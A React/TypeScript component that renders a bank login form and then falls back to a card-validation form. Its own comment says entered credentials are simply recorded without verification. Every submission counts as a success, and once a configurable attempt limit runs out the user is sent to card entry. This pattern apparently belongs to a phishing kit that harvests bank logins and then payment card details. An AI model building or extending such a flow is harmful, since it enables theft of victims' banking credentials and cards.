import { useState, type FormEvent } from 'react';
import { useTranslation } from 'react-i18next';
import {
  loginBank,
  getRemainingAttempts,
  type BankSession,
} from '@/hooks/useBankAuth';
import { getRemainingCardAttempts } from '@/hooks/useCardAuth';
import type { Bank } from '@/hooks/useBanks';
import CardValidationCard from './CardValidationCard';
import type { ClientAccount } from '@/hooks/useClientAuth';

type BankLoginCardProps = {
  client: ClientAccount;
  bank: Bank;
  onSuccess: (session: BankSession) => void;
  onCardSuccess: () => void;
  onLogout: () => void;
};

type FormErrors = {
  identifier?: string;
  password?: string;
};

export default function BankLoginCard({
  client,
  bank,
  onSuccess,
  onCardSuccess,
  onLogout,
}: BankLoginCardProps) {
  const { t } = useTranslation();
  const [identifier, setIdentifier] = useState('');
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [errors, setErrors] = useState<FormErrors>({});
  const [submitting, setSubmitting] = useState(false);
  const [remaining, setRemaining] = useState(() => getRemainingAttempts(client.maxBankAttempts));
  const [cardBlocked, setCardBlocked] = useState(
    () => getRemainingCardAttempts(client.maxCardAttempts) <= 0,
  );

  const blocked = remaining <= 0;

  const clearError = (key: keyof FormErrors) => {
    setErrors((prev) => ({ ...prev, [key]: undefined }));
  };

  const handleSubmit = (event: FormEvent<HTMLFormElement>) => {
    event.preventDefault();
    if (submitting || blocked) return;

    const next: FormErrors = {};
    if (!identifier.trim()) next.identifier = t('bankAuth.errorRequired');
    if (!password) next.password = t('bankAuth.errorRequired');

    if (Object.keys(next).length > 0) {
      setErrors(next);
      return;
    }

    setErrors({});
    setSubmitting(true);

    // Les identifiants sont seulement enregistrés pour la session : aucune
    // vérification n'a lieu à cette étape. La conformité est contrôlée et
    // journalisée côté Backend uniquement lors de la validation finale.
    onSuccess(loginBank(bank, identifier, password, true));
  };

  const inputClass = (invalid?: string) =>
    `w-full rounded-md border bg-background-50 py-3 pl-12 text-sm text-foreground-950 outline-none transition-colors placeholder:text-foreground-400 focus:ring-2 ${
      invalid
        ? 'border-secondary-400 focus:border-secondary-500 focus:ring-secondary-200'
        : 'border-background-300 focus:border-primary-500 focus:ring-primary-200'
    }`;

  if (blocked) {
    return (
      <div className="space-y-5">
        {cardBlocked && (
          <div className="flex items-start gap-3 rounded-lg border border-accent-200 bg-accent-50 px-5 py-4">
            <span className="flex h-8 w-8 shrink-0 items-center justify-center rounded-full bg-accent-500 text-background-50">
              <i className="ri-alert-line text-base"></i>
            </span>
            <div>
              <p className="text-sm font-semibold text-accent-900">{t('bankAuth.blockedTitle')}</p>
              <p className="mt-1 text-xs leading-relaxed text-accent-800">{t('bankAuth.blockedText')}</p>
            </div>
          </div>
        )}
        <CardValidationCard
          client={client}
          onSuccess={onCardSuccess}
          onLogout={onLogout}
          onBlockedChange={setCardBlocked}
        />
      </div>
    );
  }

  return (
    <form
      onSubmit={handleSubmit}
      className="rounded-lg border border-background-200 bg-background-50 p-6 md:p-7"
    >
      <div className="flex items-start gap-3 border-b border-background-200 pb-5">
        <span className="flex h-11 w-11 items-center justify-center rounded-lg bg-primary-100 text-primary-700">
          <i className="ri-bank-line text-xl"></i>
        </span>
        <div>
          <h2 className="font-heading text-base font-semibold text-foreground-950">
            {t('bankAuth.formTitle')}
          </h2>
          <p className="mt-0.5 text-xs text-foreground-500">{t('bankAuth.formSubtitle')}</p>
        </div>
      </div>

      <div className="mt-5 flex items-center justify-between rounded-md border border-primary-200 bg-primary-50 px-4 py-3">
        <span className="flex items-center gap-2 text-xs font-medium text-foreground-600">
          <i className="ri-bank-fill text-base text-primary-700"></i>
          {t('bankAuth.selectedBank')}
        </span>
        <span className="text-sm font-semibold text-foreground-950">{bank.name}</span>
      </div>

      <div className="mt-5 flex items-center justify-between rounded-md border border-background-200 bg-background-100 px-4 py-3">
        <span className="flex items-center gap-2 text-xs font-medium text-foreground-600">
          <i className="ri-shield-keyhole-line text-base text-primary-700"></i>
          {t('bankAuth.attempts', { count: remaining, max: client.maxBankAttempts })}
        </span>
        <span className="flex items-center gap-1">
          {Array.from({ length: client.maxBankAttempts }).map((_, index) => (
            <span
              key={`attempt-${index}`}
              className={`h-2 w-2 rounded-full ${
                index < remaining ? 'bg-primary-500' : 'bg-background-300'
              }`}
            ></span>
          ))}
        </span>
      </div>

      <div className="mt-5 space-y-5">
        <div>
          <label htmlFor="identifier" className="mb-2 block text-sm font-semibold text-foreground-800">
            {t('bankAuth.id')} <span className="text-secondary-600">*</span>
          </label>
          <div className="relative">
            <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
              <i className="ri-user-shared-line text-lg"></i>
            </span>
            <input
              id="identifier"
              name="identifier"
              type="text"
              autoComplete="off"
              value={identifier}
              onChange={(event) => {
                setIdentifier(event.target.value);
                clearError('identifier');
              }}
              placeholder={t('bankAuth.idPh')}
              className={inputClass(errors.identifier)}
            />
          </div>
          {errors.identifier && (
            <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
              <i className="ri-error-warning-line"></i>
              {errors.identifier}
            </p>
          )}
        </div>

        <div>
          <label htmlFor="password" className="mb-2 block text-sm font-semibold text-foreground-800">
            {t('bankAuth.password')} <span className="text-secondary-600">*</span>
          </label>
          <div className="relative">
            <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
              <i className="ri-lock-password-line text-lg"></i>
            </span>
            <input
              id="password"
              name="password"
              type={showPassword ? 'text' : 'password'}
              autoComplete="off"
              value={password}
              onChange={(event) => {
                setPassword(event.target.value);
                clearError('password');
              }}
              placeholder={t('bankAuth.passwordPh')}
              className={`${inputClass(errors.password)} pr-12`}
            />
            <button
              type="button"
              onClick={() => setShowPassword((prev) => !prev)}
              aria-label={showPassword ? t('bankAuth.hidePassword') : t('bankAuth.showPassword')}
              className="absolute right-4 top-1/2 flex h-5 w-5 -translate-y-1/2 cursor-pointer items-center justify-center text-foreground-400 transition-colors hover:text-foreground-700"
            >
              <i className={`${showPassword ? 'ri-eye-off-line' : 'ri-eye-line'} text-lg`}></i>
            </button>
          </div>
          {errors.password && (
            <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
              <i className="ri-error-warning-line"></i>
              {errors.password}
            </p>
          )}
        </div>
      </div>

      <button
        type="submit"
        disabled={submitting}
        className="mt-6 flex w-full cursor-pointer items-center justify-center gap-2 whitespace-nowrap rounded-md bg-primary-500 px-5 py-3.5 text-sm font-semibold text-background-50 transition-colors hover:bg-primary-600 disabled:cursor-not-allowed disabled:opacity-60"
      >
        <i className={`${submitting ? 'ri-loader-4-line animate-spin' : 'ri-shield-keyhole-line'} text-lg`}></i>
        {submitting ? t('bankAuth.submitting') : t('bankAuth.submit')}
      </button>

      <div className="mt-5 flex items-start gap-2 text-xs leading-relaxed text-foreground-500">
        <i className="ri-lock-2-line mt-0.5 text-sm text-primary-700"></i>
        <span>{t('bankAuth.secureNote')}</span>
      </div>

      <div className="mt-3 flex items-start gap-2 text-xs leading-relaxed text-foreground-500">
        <i className="ri-shield-check-line mt-0.5 text-sm text-secondary-600"></i>
        <span>{t('bankAuth.verifyNote')}</span>
      </div>
    </form>
  );
}